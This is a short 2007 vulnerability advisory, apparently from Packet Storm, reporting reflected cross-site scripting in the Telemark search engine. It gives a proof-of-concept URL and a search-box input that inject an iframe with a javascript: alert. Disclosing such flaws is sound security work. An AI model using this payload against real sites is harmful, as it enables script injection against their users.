telemark-xss.txt

🗓️ 31 Aug 2007 00:00:00Reported by TosserType

packetstorm🔗 packetstormsecurity.com👁 18 Views

Telemark search engine is vulnerable to cross site scripting attacks via crafted iframe input.

`# Title : Telemark XSS  
  
# Description : The Telemark (telemark.com) search engine is vulnerable to XSS  
  
# Author : Tosser  
  
# E-mail : [email protected]  
  
# Proof : http://telemark.com/results-b.jsp?searchTerm=%3Ciframe+src%3D%22javascript%3Aalert%28%27XSS%27%29%22%3E%3C%2Fiframe%3E&x=51&y=11&domainName=telemark.com&w=false&afdt=In51F73BbzMKEwiLy6KLpZ6OAhUJGRoKHfV_kdQYAyAAMNmNlQ84DQ&searchbox=y  
or go to telemark.com and type "<iframe src="javascript:alert('XSS')"></iframe>" in the search box.`

31 Aug 2007 00:00Current

7.4High risk

Vulners AI Score7.4